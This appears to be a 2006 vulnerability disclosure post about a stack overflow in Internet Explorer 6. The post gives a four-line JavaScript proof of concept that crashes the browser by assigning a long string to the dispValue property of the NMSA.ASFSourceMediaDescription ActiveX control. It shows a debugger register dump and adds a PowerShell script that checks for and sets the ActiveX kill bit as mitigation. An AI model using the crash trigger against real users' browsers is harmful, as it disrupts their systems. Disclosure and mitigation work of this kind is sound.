The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows 2000 SP4 system. Setting the dispValue property of this object to a long string triggers a stack overflow (not a buffer overflow).
var a = new ActiveXObject('NMSA.ASFSourceMediaDescription.1'); // instantiate the control by ProgID
var b = 'XXXX';
while (b.length <= 1024) b += b; // double until it exceeds 1024 chars (ends at 2048)
a.dispValue = b;                 // assigning the long string crashes the IE process
Demonstration
eax=027221f8 ebx=00000000 ecx=0019d198
edx=00160dae esi=027221f8 edi=00000000
eip=77a22395 esp=00032f78 ebp=00033180
OLEAUT32!CTypeInfo2::VariantVtOfHtype+0x9:
77a22395 56 push esi
This bug will be added to the OSVDB:
Microsoft IE NMSA.ASFSourceMediaDescription dispValue Stack Overflow
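Until a fix is available, the standard mitigation is IE's ActiveX kill bit for the control. The following script is an added example, not part of the original post: it resolves the ProgID named above to its CLSID via HKEY_CLASSES_ROOT, reports whether the kill bit (Compatibility Flags 0x400) is set under IE's ActiveX Compatibility key, and optionally sets it. The `-SetKillBit` switch is an assumed parameter name; the CLSID is read from the machine because the post does not give it.

```powershell
# Added example (not the original post's code): check or set the IE kill bit for the
# control discussed above. Run as Administrator when using -SetKillBit.
param(
    [string]$ProgId = 'NMSA.ASFSourceMediaDescription.1',
    [switch]$SetKillBit   # assumed switch name: write the kill bit instead of only reporting
)

# Resolve ProgID -> CLSID from the registry (the post does not state the CLSID).
$clsid = (Get-ItemProperty -Path "Registry::HKEY_CLASSES_ROOT\$ProgId\CLSID" `
          -ErrorAction SilentlyContinue).'(default)'
if (-not $clsid) {
    Write-Output "ProgID $ProgId is not registered on this machine; nothing to do."
    return
}

$compatKey = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
$killBit   = 0x400   # Compatibility Flags bit that stops IE from loading the control

$flags = (Get-ItemProperty -Path $compatKey -Name 'Compatibility Flags' `
          -ErrorAction SilentlyContinue).'Compatibility Flags'

if ($flags -and ($flags -band $killBit)) {
    Write-Output "$ProgId ($clsid): kill bit already set (flags=0x$('{0:X}' -f $flags))."
} else {
    Write-Output "$ProgId ($clsid): kill bit NOT set; IE will instantiate this control from script."
    if ($SetKillBit) {
        New-Item -Path $compatKey -Force | Out-Null
        $newFlags = [int]$flags -bor $killBit      # $null flags become 0 before OR-ing
        Set-ItemProperty -Path $compatKey -Name 'Compatibility Flags' -Value $newFlags -Type DWord
        Write-Output "Kill bit set for $clsid; restart Internet Explorer for it to take effect."
    }
}
```

On 64-bit Windows the same key also exists under SOFTWARE\Wow6432Node for 32-bit IE, so check both locations there.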
Sunday, July 23, 2006